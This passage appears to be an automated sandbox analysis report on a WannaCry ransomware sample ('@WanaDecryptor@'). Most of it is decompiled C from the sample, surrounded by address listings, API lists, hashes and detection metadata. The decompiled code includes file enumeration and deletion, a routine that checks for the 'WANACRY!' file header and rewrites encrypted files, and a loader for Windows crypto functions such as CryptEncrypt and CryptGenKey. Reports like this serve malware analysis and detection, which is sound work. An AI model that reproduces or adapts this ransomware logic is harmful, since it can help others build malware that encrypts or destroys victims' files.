					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                  0x004026b0
                                  0x004026b2
                                  0x004026bd
                                  0x004026be
                                  0x004026c5
                                  0x004026d3
                                  0x004026db
                                  0x004026e4
                                  0x004026e8
                                  0x004026f1
                                  0x004026fa
                                  0x00402706
                                  0x0040270a
                                  0x00402720
                                  0x00402728
                                  0x0040272e
                                  0x0040273e
                                  0x00402747
                                  0x0040274b
                                  0x004027c2
                                  0x004027c2
                                  0x004027ca
                                  0x00000000
                                  0x00000000
                                  0x004027e1
                                  0x004027e3
                                  0x004027e8
                                  0x004027fb
                                  0x004027fd
                                  0x00402802
                                  0x00402816
                                  0x00402822
                                  0x00402828
                                  0x00402838
                                  0x004028c3
                                  0x004028c5
                                  0x004028ca
                                  0x004028dd
                                  0x004028df
                                  0x004028e4
                                  0x004028f3
                                  0x004028f5
                                  0x004028fa
                                  0x00402905
                                  0x00402909
                                  0x00402914
                                  0x00402916
                                  0x00402923
                                  0x0040293c
                                  0x00402944
                                  0x00402949
                                  0x00402951
                                  0x00000000
                                  0x00402953
                                  0x004028fa
                                  0x004028e4
                                  0x0040283a
                                  0x00402850
                                  0x0040285f
                                  0x00402863
                                  0x0040286e
                                  0x00402870
                                  0x0040287d
                                  0x00402896
                                  0x0040289e
                                  0x004028a3
                                  0x004028ab
                                  0x00402957
                                  0x00402957
                                  0x00402957
                                  0x00402850
                                  0x00402838
                                  0x00402802
                                  0x00402972
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402972
                                  0x0040297d
                                  0x00402983
                                  0x00402987
                                  0x0040298b
                                  0x0040298d
                                  0x0040298d
                                  0x00402995
                                  0x00000000
                                  0x00000000
                                  0x0040299b
                                  0x004029a0
                                  0x004029a2
                                  0x004029a2
                                  0x004029aa
                                  0x004029af
                                  0x004029b7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029b7
                                  0x0040298d
                                  0x004029b9
                                  0x004029b9
                                  0x004029bd
                                  0x004029c1
                                  0x004029c3
                                  0x004029c3
                                  0x004029cb
                                  0x00000000
                                  0x00000000
                                  0x004029d1
                                  0x004029d6
                                  0x004029d8
                                  0x004029d8
                                  0x004029e0
                                  0x004029e5
                                  0x004029ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029ed
                                  0x004029c3
                                  0x004029ef
                                  0x004029ef
                                  0x00402a0c
                                  0x00402a0e
                                  0x00402a16
                                  0x00402a2c
                                  0x00402a2e
                                  0x00402a36
                                  0x00402a3c
                                  0x00402a40
                                  0x00402a47
                                  0x00402a49
                                  0x00402a4d
                                  0x00402a4f
                                  0x00402a4f
                                  0x00402a51
                                  0x00402a5d
                                  0x00402a62
                                  0x00402a66
                                  0x00402a66
                                  0x00402a6a
                                  0x00402a6b
                                  0x00402a70
                                  0x00402a74
                                  0x00402a78
                                  0x00402a7c
                                  0x00402a7f
                                  0x00402a81
                                  0x00402a8e
                                  0x00402a92
                                  0x00402a94
                                  0x00402a98
                                  0x00402aaf
                                  0x00402ab4
                                  0x00402a94
                                  0x00402abe
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac7
                                  0x0040274d
                                  0x00402751
                                  0x00402765
                                  0x0040276e
                                  0x0040276f
                                  0x00402778
                                  0x0040277b
                                  0x0040277f
                                  0x00402790
                                  0x0040279b
                                  0x004027a4
                                  0x004027a5
                                  0x004027aa
                                  0x004027ad
                                  0x004027ad
                                  0x00402ad7
                                  0x00402ae4

                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                  0x004020a3
                                  0x004020a5
                                  0x004020aa
                                  0x004020b5
                                  0x004020b6
                                  0x004020c5
                                  0x004020c6
                                  0x004020cc
                                  0x004020cf
                                  0x004020d5
                                  0x004020dd
                                  0x004020e0
                                  0x004020e6
                                  0x004020ef
                                  0x004020f5
                                  0x004020fc
                                  0x00402102
                                  0x00402108
                                  0x0040210b
                                  0x0040210e
                                  0x00402114
                                  0x0040212d
                                  0x0040212f
                                  0x00402137
                                  0x00402159
                                  0x0040216e
                                  0x00402174
                                  0x00402176
                                  0x0040244c
                                  0x0040244c
                                  0x00402451
                                  0x00000000
                                  0x0040217c
                                  0x0040218c
                                  0x0040218e
                                  0x00402190
                                  0x00000000
                                  0x00402196
                                  0x004021a5
                                  0x004021ab
                                  0x004021ad
                                  0x00000000
                                  0x004021b3
                                  0x004021b3
                                  0x004021bd
                                  0x00000000
                                  0x004021c3
                                  0x004021ce
                                  0x004021dc
                                  0x004021e2
                                  0x004021e4
                                  0x00000000
                                  0x004021ea
                                  0x004021fa
                                  0x00402200
                                  0x00402202
                                  0x00000000
                                  0x00402208
                                  0x00402218
                                  0x0040221e
                                  0x00402220
                                  0x00000000
                                  0x00402226
                                  0x00402226
                                  0x0040222d
                                  0x0040230f
                                  0x00402315
                                  0x00402317
                                  0x0040231d
                                  0x00402320
                                  0x0040232f
                                  0x00402336
                                  0x00402345
                                  0x00402348
                                  0x0040234d
                                  0x0040234f
                                  0x0040238b
                                  0x0040238b
                                  0x0040238e
                                  0x00402393
                                  0x00402394
                                  0x0040239a
                                  0x004023a1
                                  0x004023a2
                                  0x004023ad
                                  0x004023b6
                                  0x004023b9
                                  0x004023bc
                                  0x004023be
                                  0x00000000
                                  0x00000000
                                  0x004023c4
                                  0x004023d1
                                  0x004023d1
                                  0x004023d7
                                  0x004023d9
                                  0x004023e0
                                  0x004023f3
                                  0x004023f9
                                  0x004023fb
                                  0x0040246f
                                  0x0040246f
                                  0x00402474
                                  0x00000000
                                  0x004023fd
                                  0x004023fd
                                  0x00402400
                                  0x00402402
                                  0x00000000
                                  0x00402404
                                  0x00402404
                                  0x00402407
                                  0x0040241c
                                  0x0040241f
                                  0x00402436
                                  0x0040243c
                                  0x0040243e
                                  0x00000000
                                  0x00402440
                                  0x00402443
                                  0x00402446
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402446
                                  0x0040243e
                                  0x00402402
                                  0x004023db
                                  0x004023db
                                  0x004023de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023de
                                  0x004023c6
                                  0x004023c9
                                  0x004023cb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023cb
                                  0x00000000
                                  0x004023c4
                                  0x00402477
                                  0x0040248a
                                  0x00402491
                                  0x00000000
                                  0x00402351
                                  0x00402354
                                  0x0040235b
                                  0x0040236a
                                  0x0040236d
                                  0x00402372
                                  0x00402374
                                  0x00402381
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402374
                                  0x00402322
                                  0x00402322
                                  0x00402326
                                  0x00000000
                                  0x00402326
                                  0x00402233
                                  0x00402234
                                  0x00402253
                                  0x00402255
                                  0x0040225b
                                  0x0040225e
                                  0x00000000
                                  0x00402264
                                  0x00402274
                                  0x00402289
                                  0x0040228f
                                  0x00402291
                                  0x00000000
                                  0x00402297
                                  0x00402297
                                  0x0040229e
                                  0x00000000
                                  0x004022a4
                                  0x004022ab
                                  0x004022c0
                                  0x004022c6
                                  0x004022c8
                                  0x00402376
                                  0x00402376
                                  0x0040237b
                                  0x00000000
                                  0x004022ce
                                  0x004022ce
                                  0x004022d5
                                  0x00000000
                                  0x004022db
                                  0x004022e5
                                  0x004022e8
                                  0x004022ee
                                  0x00402497
                                  0x004024ad
                                  0x004024b3
                                  0x004024ba
                                  0x004024c3
                                  0x004024c3
                                  0x004024c6
                                  0x004024cc
                                  0x004024da
                                  0x004024da
                                  0x004024e0
                                  0x004024e6
                                  0x004024e8
                                  0x00402509
                                  0x00402509
                                  0x0040250b
                                  0x00402510
                                  0x00402511
                                  0x00402521
                                  0x0040252e
                                  0x0040252e
                                  0x004022d5
                                  0x004022c8
                                  0x0040229e
                                  0x00402291
                                  0x0040225e
                                  0x0040222d
                                  0x00402220
                                  0x00402202
                                  0x004021e4
                                  0x004021bd
                                  0x004021ad
                                  0x00402190
                                  0x00402139
                                  0x00402139
                                  0x0040213d
                                  0x00402452
                                  0x00402452
                                  0x0040245f
                                  0x0040246c
                                  0x0040246c
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                  0x00403cb0
                                  0x00403cbe
                                  0x00403cc6
                                  0x00403cca
                                  0x00403cd3
                                  0x00403cd7
                                  0x00403ceb
                                  0x00403e1f
                                  0x00403e1f
                                  0x00403e23
                                  0x00403e34
                                  0x00403cec
                                  0x00403cf4
                                  0x00403d06
                                  0x00403d0e
                                  0x00403d26
                                  0x00403d2c
                                  0x00403d32
                                  0x00403d4b
                                  0x00403d4d
                                  0x00403d52
                                  0x00403d56
                                  0x00403d69
                                  0x00403d6f
                                  0x00403d75
                                  0x00403d7b
                                  0x00403d7f
                                  0x00403d85
                                  0x00403d8d
                                  0x00403db4
                                  0x00403dbb
                                  0x00403dc0
                                  0x00403dc5
                                  0x00403dcc
                                  0x00403dcd
                                  0x00403dcf
                                  0x00403d8f
                                  0x00403d99
                                  0x00403d9f
                                  0x00403da6
                                  0x00403da7
                                  0x00403da9
                                  0x00403da9
                                  0x00403ddb
                                  0x00403ddd
                                  0x00403de4
                                  0x00403ded
                                  0x00403dfc
                                  0x00403dfc
                                  0x00403e0b
                                  0x00403e0d
                                  0x00403e11
                                  0x00403e11
                                  0x00403d85
                                  0x00403e16
                                  0x00403e1c
                                  0x00403e1c
                                  0x00403d56
                                  0x00403d32
                                  0x00403d0e
                                  0x00000000
                                  0x00403e3a
                                  0x00403e3b
                                  0x00403e50
                                  0x00403e50
                                  0x00403cd9
                                  0x00403ce2
                                  0x00403ce2

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
